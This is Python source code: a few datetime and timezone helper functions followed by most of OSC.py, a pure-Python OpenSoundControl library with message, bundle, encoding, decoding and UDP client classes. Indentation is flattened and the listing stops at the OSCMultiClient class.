# Generate UTC datetime string
datetime_string = datetime_obj.strftime(strftime)
# print type(datetime_string)
return datetime_string
def datetime_local_to_datetime_utc(datetime_local):
# Hardcode utc zone
utc_zone = tz.gettz('UTC')
# or Auto-detect utc zone
# utc_zone = tz.tzutc()
# Convert local time to UTC
datetime_utc = datetime_local.astimezone(utc_zone)
# print type(datetime_utc)
return datetime_utc
def datetime_utc_to_datetime_local(datetime_utc, local_zone = None):
if local_zone is None :
# Hardcode local zone
# local_zone = tz.gettz('America/Chicago')
# or Auto-detect local zone
local_zone = tz.tzlocal()
# Tell the datetime object that it's in local time zone since
# datetime objects are 'naive' by default
datetime_local = datetime_utc.replace(tzinfo=local_zone)
# print type(datetime_local)
return datetime_local
def string_timestamp_utc_to_string_datetime_utc(timestamp_utc, strftime = '%Y-%m-%d %H:%M:%S'):
datetime_utc = datetime.fromtimestamp(timestamp_utc).strftime(strftime)
# print type(datetime_utc)
return datetime_utc
def string_datetime_utc_to_string_timestamp_utc(datetime_utc):
# timetuple() convert datetime obj to timestamp obj
# time.mktime convert timestamp obj to timestamp string
timestamp_utc = time.mktime(datetime_utc.timetuple())
# print type(timestamp_utc)
return timestamp_utc
# Create Jinja new filter
def datetimeformat(date, format='%Y-%m-%d %H:%M:%S'):
return string_timestamp_utc_to_string_datetime_utc(date, format)
app.jinja_env.filters['datetimeformat'] = datetimeformat
|
OSC.py
|
#!/usr/bin/python
"""
This module contains an OpenSoundControl implementation (in Pure Python), based
(somewhat) on the good old 'SimpleOSC' implementation by Daniel Holth & Clinton
McChesney.
This implementation is intended to still be 'simple' to the user, but much more
complete (with OSCServer & OSCClient classes) and much more powerful (the
OSCMultiClient supports subscriptions & message-filtering, OSCMessage &
OSCBundle are now proper container-types)
===============================================================================
OpenSoundControl
===============================================================================
OpenSoundControl is a network-protocol for sending (small) packets of addressed
data over network sockets. This OSC-implementation supports the classical
UDP/IP protocol for sending and receiving packets but provides as well support
for TCP/IP streaming, whereas the message size is prepended as int32 (big
endian) before each message/packet.
OSC-packets come in two kinds:
- OSC-messages consist of an 'address'-string (not to be confused with a
(host:port) network-address!), followed by a string of 'typetags'
associated with the message's arguments (ie. 'payload'), and finally the
arguments themselves, encoded in an OSC-specific way. The OSCMessage class
makes it easy to create & manipulate OSC-messages of this kind in a
'pythonesque' way (that is, OSCMessage-objects behave a lot like lists)
- OSC-bundles are a special type of OSC-message containing only
OSC-messages as 'payload'. Recursively. (meaning; an OSC-bundle could
contain other OSC-bundles, containing OSC-bundles etc.)
OSC-bundles start with the special keyword '#bundle' and do not have an
OSC-address (but the OSC-messages a bundle contains will have OSC-addresses!).
Also, an OSC-bundle can have a timetag, essentially telling the receiving
server to 'hold' the bundle until the specified time. The OSCBundle class
allows easy cration & manipulation of OSC-bundles.
For further information see also http://opensoundcontrol.org/spec-1_0
-------------------------------------------------------------------------------
To send OSC-messages, you need an OSCClient, and to receive OSC-messages you
need an OSCServer.
The OSCClient uses an 'AF_INET / SOCK_DGRAM' type socket (see the 'socket'
module) to send binary representations of OSC-messages to a remote host:port
address.
The OSCServer listens on an 'AF_INET / SOCK_DGRAM' type socket bound to a local
port, and handles incoming requests. Either one-after-the-other (OSCServer) or
in a multi-threaded / multi-process fashion (ThreadingOSCServer/
ForkingOSCServer). If the Server has a callback-function (a.k.a. handler)
registered to 'deal with' (i.e. handle) the received message's OSC-address,
that function is called, passing it the (decoded) message.
The different OSCServers implemented here all support the (recursive) un-
bundling of OSC-bundles, and OSC-bundle timetags.
In fact, this implementation supports:
- OSC-messages with 'i' (int32), 'f' (float32), 'd' (double), 's' (string) and
'b' (blob / binary data) types
- OSC-bundles, including timetag-support
- OSC-address patterns including '*', '?', '{,}' and '[]' wildcards.
(please *do* read the OSC-spec! http://opensoundcontrol.org/spec-1_0 it
explains what these things mean.)
In addition, the OSCMultiClient supports:
- Sending a specific OSC-message to multiple remote servers
- Remote server subscription / unsubscription (through OSC-messages, of course)
- Message-address filtering.
-------------------------------------------------------------------------------
SimpleOSC:
Copyright (c) Daniel Holth & Clinton McChesney.
pyOSC:
Copyright (c) 2008-2010, Artem Baguinski <artm@v2.nl> et al., Stock, V2_Lab, Rotterdam, Netherlands.
Streaming support (OSC over TCP):
Copyright (c) 2010 Uli Franke <uli.franke@weiss.ch>, Weiss Engineering, Uster, Switzerland.
-------------------------------------------------------------------------------
Changelog:
-------------------------------------------------------------------------------
v0.3.0 - 27 Dec. 2007
Started out to extend the 'SimpleOSC' implementation (v0.2.3) by Daniel Holth & Clinton McChesney.
Rewrote OSCMessage
Added OSCBundle
v0.3.1 - 3 Jan. 2008
Added OSClient
Added OSCRequestHandler, loosely based on the original CallbackManager
Added OSCServer
Removed original CallbackManager
Adapted testing-script (the 'if __name__ == "__main__":' block at the end) to use new Server & Client
v0.3.2 - 5 Jan. 2008
Added 'container-type emulation' methods (getitem(), setitem(), __iter__() & friends) to OSCMessage
Added ThreadingOSCServer & ForkingOSCServer
- 6 Jan. 2008
Added OSCMultiClient
Added command-line options to testing-script (try 'python OSC.py --help')
v0.3.3 - 9 Jan. 2008
Added OSC-timetag support to OSCBundle & OSCRequestHandler
Added ThreadingOSCRequestHandler
v0.3.4 - 13 Jan. 2008
Added message-filtering to OSCMultiClient
Added subscription-handler to OSCServer
Added support fon numpy/scipy int & float types. (these get converted to 'standard' 32-bit OSC ints / floats!)
Cleaned-up and added more Docstrings
v0.3.5 - 14 aug. 2008
Added OSCServer.reportErr(...) method
v0.3.6 - 19 April 2010
Added Streaming support (OSC over TCP)
Updated documentation
Moved pattern matching stuff into separate class (OSCAddressSpace) to
facilitate implementation of different server and client architectures.
Callbacks feature now a context (object oriented) but dynamic function
inspection keeps the code backward compatible
Moved testing code into separate testbench (testbench.py)
-----------------
Original Comments
-----------------
> Open SoundControl for Python
> Copyright (C) 2002 Daniel Holth, Clinton McChesney
>
> This library is free software; you can redistribute it and/or modify it under
> the terms of the GNU Lesser General Public License as published by the Free
> Software Foundation; either version 2.1 of the License, or (at your option) any
> later version.
>
> This library is distributed in the hope that it will be useful, but WITHOUT ANY
> WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
> details.
>
> You should have received a copy of the GNU Lesser General Public License along
> with this library; if not, write to the Free Software Foundation, Inc., 59
> Temple Place, Suite 330, Boston, MA 02111-1307 USA
>
> For questions regarding this module contact Daniel Holth <dholth@stetson.edu>
> or visit http://www.stetson.edu/~ProctoLogic/
>
> Changelog:
> 15 Nov. 2001:
> Removed dependency on Python 2.0 features.
> - dwh
> 13 Feb. 2002:
> Added a generic callback handler.
> - dwh
"""
from __future__ import print_function
import math, re, socket, select, string, struct, sys, threading, time, types, array, errno, inspect
from SocketServer import UDPServer, DatagramRequestHandler, ForkingMixIn, ThreadingMixIn, StreamRequestHandler, TCPServer
from contextlib import closing
global version
version = ("0.3","6", "$Rev: 6382 $"[6:-2])
global FloatTypes
FloatTypes = [float]
global IntTypes
IntTypes = [int]
global NTP_epoch
from calendar import timegm
NTP_epoch = timegm((1900,1,1,0,0,0)) # NTP time started in 1 Jan 1900
del timegm
global NTP_units_per_second
NTP_units_per_second = 0x100000000 # about 232 picoseconds
##
# numpy/scipy support:
##
try:
from numpy import typeDict
for ftype in ['float32', 'float64', 'float128']:
try:
FloatTypes.append(typeDict[ftype])
except KeyError:
pass
for itype in ['int8', 'int16', 'int32', 'int64']:
try:
IntTypes.append(typeDict[itype])
IntTypes.append(typeDict['u' + itype])
except KeyError:
pass
# thanks for those...
del typeDict, ftype, itype
except ImportError:
pass
######
#
# OSCMessage classes
#
######
class OSCMessage(object):
""" Builds typetagged OSC messages.
OSCMessage objects are container objects for building OSC-messages.
On the 'front' end, they behave much like list-objects, and on the 'back' end
they generate a binary representation of the message, which can be sent over a network socket.
OSC-messages consist of an 'address'-string (not to be confused with a (host, port) IP-address!),
followed by a string of 'typetags' associated with the message's arguments (ie. 'payload'),
and finally the arguments themselves, encoded in an OSC-specific way.
On the Python end, OSCMessage are lists of arguments, prepended by the message's address.
The message contents can be manipulated much like a list:
>>> msg = OSCMessage("/my/osc/address")
>>> msg.append('something')
>>> msg.insert(0, 'something else')
>>> msg[1] = 'entirely'
>>> msg.extend([1,2,3.])
>>> msg += [4, 5, 6.]
>>> del msg[3:6]
>>> msg.pop(-2)
5
>>> print msg
/my/osc/address ['something else', 'entirely', 1, 6.0]
OSCMessages can be concatenated with the + operator. In this case, the resulting OSCMessage
inherits its address from the left-hand operand. The right-hand operand's address is ignored.
To construct an 'OSC-bundle' from multiple OSCMessage, see OSCBundle!
Additional methods exist for retreiving typetags or manipulating items as (typetag, value) tuples.
"""
def __init__(self, address="", *args):
"""Instantiate a new OSCMessage.
The OSC-address can be specified with the 'address' argument.
The rest of the arguments are appended as data.
"""
self.clear(address)
if len(args)>0:
self.append(*args)
def setAddress(self, address):
"""Set or change the OSC-address
"""
self.address = address
def clear(self, address=""):
"""Clear (or set a new) OSC-address and clear any arguments appended so far
"""
self.address = address
self.clearData()
def clearData(self):
"""Clear any arguments appended so far
"""
self.typetags = ","
self.message = ""
def append(self, argument, typehint=None):
"""Appends data to the message, updating the typetags based on
the argument's type. If the argument is a blob (counted
string) pass in 'b' as typehint.
'argument' may also be a list or tuple, in which case its elements
will get appended one-by-one, all using the provided typehint
"""
if type(argument) == dict:
argument = argument.items()
elif isinstance(argument, OSCMessage):
raise TypeError("Can only append 'OSCMessage' to 'OSCBundle'")
if hasattr(argument, '__iter__'):
for arg in argument:
self.append(arg, typehint)
return
if typehint == 'b':
binary = OSCBlob(argument)
tag = 'b'
elif typehint == 't':
binary = OSCTimeTag(argument)
tag = 't'
else:
tag, binary = OSCArgument(argument, typehint)
self.typetags += tag
self.message += binary
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString(self.address)
binary += OSCString(self.typetags)
binary += self.message
return binary
def __repr__(self):
"""Returns a string containing the decode Message
"""
return str(decodeOSC(self.getBinary()))
def __str__(self):
"""Returns the Message's address and contents as a string.
"""
return "%s %s" % (self.address, str(self.values()))
def __len__(self):
"""Returns the number of arguments appended so far
"""
return (len(self.typetags) - 1)
def __eq__(self, other):
"""Return True if two OSCMessages have the same address & content
"""
if not isinstance(other, self.__class__):
return False
return (self.address == other.address) and (self.typetags == other.typetags) and (self.message == other.message)
def __ne__(self, other):
"""Return (not self.__eq__(other))
"""
return not self.__eq__(other)
def __add__(self, values):
"""Returns a copy of self, with the contents of 'values' appended
(see the 'extend()' method, below)
"""
msg = self.copy()
msg.extend(values)
return msg
def __iadd__(self, values):
"""Appends the contents of 'values'
(equivalent to 'extend()', below)
Returns self
"""
self.extend(values)
return self
def __radd__(self, values):
"""Appends the contents of this OSCMessage to 'values'
Returns the extended 'values' (list or tuple)
"""
out = list(values)
out.extend(self.values())
if type(values) == tuple:
return tuple(out)
return out
def _reencode(self, items):
"""Erase & rebuild the OSCMessage contents from the given
list of (typehint, value) tuples"""
self.clearData()
for item in items:
self.append(item[1], item[0])
def values(self):
"""Returns a list of the arguments appended so far
"""
return decodeOSC(self.getBinary())[2:]
def tags(self):
"""Returns a list of typetags of the appended arguments
"""
return list(self.typetags.lstrip(','))
def items(self):
"""Returns a list of (typetag, value) tuples for
the arguments appended so far
"""
out = []
values = self.values()
typetags = self.tags()
for i in range(len(values)):
out.append((typetags[i], values[i]))
return out
def __contains__(self, val):
"""Test if the given value appears in the OSCMessage's arguments
"""
return (val in self.values())
def __getitem__(self, i):
"""Returns the indicated argument (or slice)
"""
return self.values()[i]
def __delitem__(self, i):
"""Removes the indicated argument (or slice)
"""
items = self.items()
del items[i]
self._reencode(items)
def _buildItemList(self, values, typehint=None):
if isinstance(values, OSCMessage):
items = values.items()
elif type(values) == list:
items = []
for val in values:
if type(val) == tuple:
items.append(val[:2])
else:
items.append((typehint, val))
elif type(values) == tuple:
items = [values[:2]]
else:
items = [(typehint, values)]
return items
def __setitem__(self, i, val):
"""Set indicatated argument (or slice) to a new value.
'val' can be a single int/float/string, or a (typehint, value) tuple.
Or, if 'i' is a slice, a list of these or another OSCMessage.
"""
items = self.items()
new_items = self._buildItemList(val)
if type(i) != slice:
if len(new_items) != 1:
raise TypeError("single-item assignment expects a single value or a (typetag, value) tuple")
new_items = new_items[0]
# finally...
items[i] = new_items
self._reencode(items)
def setItem(self, i, val, typehint=None):
"""Set indicated argument to a new value (with typehint)
"""
items = self.items()
items[i] = (typehint, val)
self._reencode(items)
def copy(self):
"""Returns a deep copy of this OSCMessage
"""
msg = self.__class__(self.address)
msg.typetags = self.typetags
msg.message = self.message
return msg
def count(self, val):
"""Returns the number of times the given value occurs in the OSCMessage's arguments
"""
return self.values().count(val)
def index(self, val):
"""Returns the index of the first occurence of the given value in the OSCMessage's arguments.
Raises ValueError if val isn't found
"""
return self.values().index(val)
def extend(self, values):
"""Append the contents of 'values' to this OSCMessage.
'values' can be another OSCMessage, or a list/tuple of ints/floats/strings
"""
items = self.items() + self._buildItemList(values)
self._reencode(items)
def insert(self, i, val, typehint = None):
"""Insert given value (with optional typehint) into the OSCMessage
at the given index.
"""
items = self.items()
for item in reversed(self._buildItemList(val)):
items.insert(i, item)
self._reencode(items)
def popitem(self, i):
"""Delete the indicated argument from the OSCMessage, and return it
as a (typetag, value) tuple.
"""
items = self.items()
item = items.pop(i)
self._reencode(items)
return item
def pop(self, i):
"""Delete the indicated argument from the OSCMessage, and return it.
"""
return self.popitem(i)[1]
def reverse(self):
"""Reverses the arguments of the OSCMessage (in place)
"""
items = self.items()
items.reverse()
self._reencode(items)
def remove(self, val):
"""Removes the first argument with the given value from the OSCMessage.
Raises ValueError if val isn't found.
"""
items = self.items()
# this is not very efficient...
i = 0
for (t, v) in items:
if (v == val):
break
i += 1
else:
raise ValueError("'%s' not in OSCMessage" % str(v))
# but more efficient than first calling self.values().index(val),
# then calling self.items(), which would in turn call self.values() again...
del items[i]
self._reencode(items)
def __iter__(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def __reversed__(self):
"""Returns a reverse iterator of the OSCMessage's arguments
"""
return reversed(self.values())
def itervalues(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def iteritems(self):
"""Returns an iterator of the OSCMessage's arguments as
(typetag, value) tuples
"""
return iter(self.items())
def itertags(self):
"""Returns an iterator of the OSCMessage's arguments' typetags
"""
return iter(self.tags())
class OSCBundle(OSCMessage):
"""Builds a 'bundle' of OSC messages.
OSCBundle objects are container objects for building OSC-bundles of OSC-messages.
An OSC-bundle is a special kind of OSC-message which contains a list of OSC-messages
(And yes, OSC-bundles may contain other OSC-bundles...)
OSCBundle objects behave much the same as OSCMessage objects, with these exceptions:
- if an item or items to be appended or inserted are not OSCMessage objects,
OSCMessage objectss are created to encapsulate the item(s)
- an OSC-bundle does not have an address of its own, only the contained OSC-messages do.
The OSCBundle's 'address' is inherited by any OSCMessage the OSCBundle object creates.
- OSC-bundles have a timetag to tell the receiver when the bundle should be processed.
The default timetag value (0) means 'immediately'
"""
def __init__(self, address="", time=0):
"""Instantiate a new OSCBundle.
The default OSC-address for newly created OSCMessages
can be specified with the 'address' argument
The bundle's timetag can be set with the 'time' argument
"""
super(OSCBundle, self).__init__(address)
self.timetag = time
def __str__(self):
"""Returns the Bundle's contents (and timetag, if nonzero) as a string.
"""
if (self.timetag > 0.):
out = "#bundle (%s) [" % self.getTimeTagStr()
else:
out = "#bundle ["
if self.__len__():
for val in self.values():
out += "%s, " % str(val)
out = out[:-2] # strip trailing space and comma
return out + "]"
def setTimeTag(self, time):
"""Set or change the OSCBundle's TimeTag
In 'Python Time', that's floating seconds since the Epoch
"""
if time >= 0:
self.timetag = time
def getTimeTagStr(self):
"""Return the TimeTag as a human-readable string
"""
fract, secs = math.modf(self.timetag)
out = time.ctime(secs)[11:19]
out += ("%.3f" % fract)[1:]
return out
def append(self, argument, typehint = None):
"""Appends data to the bundle, creating an OSCMessage to encapsulate
the provided argument unless this is already an OSCMessage.
Any newly created OSCMessage inherits the OSCBundle's address at the time of creation.
If 'argument' is an iterable, its elements will be encapsuated by a single OSCMessage.
Finally, 'argument' can be (or contain) a dict, which will be 'converted' to an OSCMessage;
- if 'addr' appears in the dict, its value overrides the OSCBundle's address
- if 'args' appears in the dict, its value(s) become the OSCMessage's arguments
"""
if isinstance(argument, OSCMessage):
binary = OSCBlob(argument.getBinary())
else:
msg = OSCMessage(self.address)
if type(argument) == dict:
if 'addr' in argument:
msg.setAddress(argument['addr'])
if 'args' in argument:
msg.append(argument['args'], typehint)
else:
msg.append(argument, typehint)
binary = OSCBlob(msg.getBinary())
self.message += binary
self.typetags += 'b'
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString("#bundle")
binary += OSCTimeTag(self.timetag)
binary += self.message
return binary
def _reencapsulate(self, decoded):
if decoded[0] == "#bundle":
msg = OSCBundle()
msg.setTimeTag(decoded[1])
for submsg in decoded[2:]:
msg.append(self._reencapsulate(submsg))
else:
msg = OSCMessage(decoded[0])
tags = decoded[1].lstrip(',')
for i in range(len(tags)):
msg.append(decoded[2+i], tags[i])
return msg
def values(self):
"""Returns a list of the OSCMessages appended so far
"""
out = []
for decoded in decodeOSC(self.getBinary())[2:]:
out.append(self._reencapsulate(decoded))
return out
def __eq__(self, other):
"""Return True if two OSCBundles have the same timetag & content
"""
if not isinstance(other, self.__class__):
return False
return (self.timetag == other.timetag) and (self.typetags == other.typetags) and (self.message == other.message)
def copy(self):
"""Returns a deep copy of this OSCBundle
"""
copy = super(OSCBundle, self).copy()
copy.timetag = self.timetag
return copy
######
#
# OSCMessage encoding functions
#
######
def OSCString(next):
"""Convert a string into a zero-padded OSC String.
The length of the resulting string is always a multiple of 4 bytes.
The string ends with 1 to 4 zero-bytes ('\x00')
"""
OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4
return struct.pack(">%ds" % (OSCstringLength), str(next))
def OSCBlob(next):
"""Convert a string into an OSC Blob.
An OSC-Blob is a binary encoded block of data, prepended by a 'size' (int32).
The size is always a mutiple of 4 bytes.
The blob ends with 0 to 3 zero-bytes ('\x00')
"""
if type(next) in (str,):
OSCblobLength = math.ceil((len(next)) / 4.0) * 4
binary = struct.pack(">i%ds" % (OSCblobLength), OSCblobLength, next)
else:
binary = ""
return binary
def OSCArgument(next, typehint=None):
""" Convert some Python types to their
OSC binary representations, returning a
(typetag, data) tuple.
"""
if not typehint:
if type(next) in FloatTypes:
binary = struct.pack(">f", float(next))
tag = 'f'
elif type(next) in IntTypes:
binary = struct.pack(">i", int(next))
tag = 'i'
else:
binary = OSCString(next)
tag = 's'
elif typehint == 'd':
try:
binary = struct.pack(">d", float(next))
tag = 'd'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'f':
try:
binary = struct.pack(">f", float(next))
tag = 'f'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'i':
try:
binary = struct.pack(">i", int(next))
tag = 'i'
except ValueError:
binary = OSCString(next)
tag = 's'
else:
binary = OSCString(next)
tag = 's'
return (tag, binary)
def OSCTimeTag(time):
"""Convert a time in floating seconds to its
OSC binary representation
"""
if time > 0:
fract, secs = math.modf(time)
secs = secs - NTP_epoch
binary = struct.pack('>LL', long(secs), long(fract * NTP_units_per_second))
else:
binary = struct.pack('>LL', 0, 1)
return binary
######
#
# OSCMessage decoding functions
#
######
def _readString(data):
"""Reads the next (null-terminated) block of data
"""
length = string.find(data,"\0")
nextData = int(math.ceil((length+1) / 4.0) * 4)
return (data[0:length], data[nextData:])
def _readBlob(data):
"""Reads the next (numbered) block of data
"""
length = struct.unpack(">i", data[0:4])[0]
nextData = int(math.ceil((length) / 4.0) * 4) + 4
return (data[4:length+4], data[nextData:])
def _readInt(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit integer. """
if(len(data)<4):
print("Error: too few bytes for int", data, len(data))
rest = data
integer = 0
else:
integer = struct.unpack(">i", data[0:4])[0]
rest = data[4:]
return (integer, rest)
def _readLong(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit signed integer.
"""
high, low = struct.unpack(">ll", data[0:8])
big = (long(high) << 32) + low
rest = data[8:]
return (big, rest)
def _readTimeTag(data):
"""Tries to interpret the next 8 bytes of the data
as a TimeTag.
"""
high, low = struct.unpack(">LL", data[0:8])
if (high == 0) and (low <= 1):
time = 0.0
else:
time = int(NTP_epoch + high) + float(low / NTP_units_per_second)
rest = data[8:]
return (time, rest)
def _readFloat(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit float.
"""
if(len(data)<4):
print("Error: too few bytes for float", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">f", data[0:4])[0]
rest = data[4:]
return (float, rest)
def _readDouble(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit float.
"""
if(len(data)<8):
print("Error: too few bytes for double", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">d", data[0:8])[0]
rest = data[8:]
return (float, rest)
def decodeOSC(data):
"""Converts a binary OSC message to a Python list.
"""
table = {"i":_readInt, "f":_readFloat, "s":_readString, "b":_readBlob, "d":_readDouble, "t":_readTimeTag}
decoded = []
address, rest = _readString(data)
if address.startswith(","):
typetags = address
address = ""
else:
typetags = ""
if address == "#bundle":
time, rest = _readTimeTag(rest)
decoded.append(address)
decoded.append(time)
while len(rest)>0:
length, rest = _readInt(rest)
decoded.append(decodeOSC(rest[:length]))
rest = rest[length:]
elif len(rest)>0:
if not len(typetags):
typetags, rest = _readString(rest)
decoded.append(address)
decoded.append(typetags)
if typetags.startswith(","):
for tag in typetags[1:]:
value, rest = table[tag](rest)
decoded.append(value)
else:
raise OSCError("OSCMessage's typetag-string lacks the magic ','")
return decoded
######
#
# Utility functions
#
######
def hexDump(bytes):
""" Useful utility; prints the string in hexadecimal.
"""
print("byte 0 1 2 3 4 5 6 7 8 9 A B C D E F")
num = len(bytes)
for i in range(num):
if (i) % 16 == 0:
line = "%02X0 : " % (i/16)
line += "%02X " % ord(bytes[i])
if (i+1) % 16 == 0:
print("%s: %s" % (line, repr(bytes[i-15:i+1])))
line = ""
bytes_left = num % 16
if bytes_left:
print("%s: %s" % (line.ljust(54), repr(bytes[-bytes_left:])))
def getUrlStr(*args):
"""Convert provided arguments to a string in 'host:port/prefix' format
Args can be:
- (host, port)
- (host, port), prefix
- host, port
- host, port, prefix
"""
if not len(args):
return ""
if type(args[0]) == tuple:
host = args[0][0]
port = args[0][1]
args = args[1:]
else:
host = args[0]
port = args[1]
args = args[2:]
if len(args):
prefix = args[0]
else:
prefix = ""
if len(host) and (host != '0.0.0.0'):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
else:
host = 'localhost'
if type(port) == int:
return "%s:%d%s" % (host, port, prefix)
else:
return host + prefix
def parseUrlStr(url):
"""Convert provided string in 'host:port/prefix' format to it's components
Returns ((host, port), prefix)
"""
if not (type(url) in (str,) and len(url)):
return (None, '')
i = url.find("://")
if i > -1:
url = url[i+3:]
i = url.find(':')
if i > -1:
host = url[:i].strip()
tail = url[i+1:].strip()
else:
host = ''
tail = url
for i in range(len(tail)):
if not tail[i].isdigit():
break
else:
i += 1
portstr = tail[:i].strip()
tail = tail[i:].strip()
found = len(tail)
for c in ('/', '+', '-', '*'):
i = tail.find(c)
if (i > -1) and (i < found):
found = i
head = tail[:found].strip()
prefix = tail[found:].strip()
prefix = prefix.strip('/')
if len(prefix) and prefix[0] not in ('+', '-', '*'):
prefix = '/' + prefix
if len(head) and not len(host):
host = head
if len(host):
try:
host = socket.gethostbyname(host)
except socket.error:
pass
try:
port = int(portstr)
except ValueError:
port = None
return ((host, port), prefix)
######
#
# OSCClient class
#
######
class OSCClient(object):
"""Simple OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
def __init__(self, server=None):
"""Construct an OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
self.socket = None
self.setServer(server)
self.client_address = None
def _setSocket(self, skt):
"""Set and configure client socket"""
if self.socket != None:
self.close()
self.socket = skt
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
def _ensureConnected(self, address):
"""Make sure client has a socket connected to address"""
if not self.socket:
if len(address) == 4:
address_family = socket.AF_INET6
else:
address_family = socket.AF_INET
self._setSocket(socket.socket(address_family, socket.SOCK_DGRAM))
self.socket.connect(address)
def setServer(self, server):
"""Associate this Client with given server.
The Client will send from the Server's socket.
The Server will use this Client instance to send replies.
"""
if server == None:
if hasattr(self,'server') and self.server:
if self.server.client != self:
raise OSCClientError("Internal inconsistency")
self.server.client.close()
self.server.client = None
self.server = None
return
if not isinstance(server, OSCServer):
raise ValueError("'server' argument is not a valid OSCServer object")
self._setSocket(server.socket.dup())
self.server = server
if self.server.client != None:
self.server.client.close()
self.server.client = self
def close(self):
"""Disconnect & close the Client's socket
"""
if self.socket != None:
self.socket.close()
self.socket = None
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
if self.socket and other.socket:
sockEqual = cmp(self.socket._sock, other.socket._sock)
else:
sockEqual = (self.socket == None and other.socket == None)
if not sockEqual:
return False
if self.server and other.server:
return cmp(self.server, other.server)
else:
return self.server == None and other.server == None
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the remote server this client is
connected to or None if not connected to any server.
"""
try:
if self.socket:
return self.socket.getpeername()
else:
return None
except socket.error:
return None
def connect(self, address):
"""Bind to a specific OSC server:
the 'address' argument is a (host, port) tuple
- host: hostname of the remote OSC server,
- port: UDP-port the remote OSC server listens to.
"""
try:
self._ensureConnected(address)
self.client_address = address
except socket.error as e:
self.client_address = None
raise OSCClientError("SocketError: %s" % str(e))
if self.server != None:
self.server.return_port = address[1]
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage to the specified address.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifing remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self._ensureConnected(address)
self.socket.sendall(msg.getBinary())
if self.client_address:
self.socket.connect(self.client_address)
except socket.error as e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
def send(self, msg, timeout=None):
"""Send the given OSCMessage.
The Client must be already connected.
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket,
or when the Client isn't connected to a remote server.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
if not self.socket:
raise OSCClientError("Called send() on non-connected client")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.sendall(msg.getBinary())
except socket.error as e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending: %s" % str(e))
######
#
# FilterString Utility functions
#
######
def parseFilterStr(args):
"""Convert Message-Filter settings in '+<addr> -<addr> ...' format to a dict of the form
{ '<addr>':True, '<addr>':False, ... }
Returns a list: ['<prefix>', filters]
"""
out = {}
if type(args) in (str,):
args = [args]
prefix = None
for arg in args:
head = None
for plus in arg.split('+'):
minus = plus.split('-')
plusfs = minus.pop(0).strip()
if len(plusfs):
plusfs = '/' + plusfs.strip('/')
if (head == None) and (plusfs != "/*"):
head = plusfs
elif len(plusfs):
if plusfs == '/*':
out = { '/*':True } # reset all previous filters
else:
out[plusfs] = True
for minusfs in minus:
minusfs = minusfs.strip()
if len(minusfs):
minusfs = '/' + minusfs.strip('/')
if minusfs == '/*':
out = { '/*':False } # reset all previous filters
else:
out[minusfs] = False
if prefix == None:
prefix = head
return [prefix, out]
def getFilterStr(filters):
"""Return the given 'filters' dict as a list of
'+<addr>' | '-<addr>' filter-strings
"""
if not len(filters):
return []
if '/*' in filters.keys():
if filters['/*']:
out = ["+/*"]
else:
out = ["-/*"]
else:
if False in filters.values():
out = ["+/*"]
else:
out = ["-/*"]
for (addr, bool) in filters.items():
if addr == '/*':
continue
if bool:
out.append("+%s" % addr)
else:
out.append("-%s" % addr)
return out
# A translation-table for mapping OSC-address expressions to Python 're' expressions
OSCtrans = string.maketrans("{,}?","(|).")
def getRegEx(pattern):
"""Compiles and returns a 'regular expression' object for the given address-pattern.
"""
# Translate OSC-address syntax to python 're' syntax
pattern = pattern.replace(".", r"\.") # first, escape all '.'s in the pattern.
pattern = pattern.replace("(", r"\(") # escape all '('s.
pattern = pattern.replace(")", r"\)") # escape all ')'s.
pattern = pattern.replace("*", r".*") # replace a '*' by '.*' (match 0 or more characters)
pattern = pattern.translate(OSCtrans) # change '?' to '.' and '{,}' to '(|)'
return re.compile(pattern)
######
#
# OSCMultiClient class
#
######
class OSCMultiClient(OSCClient):
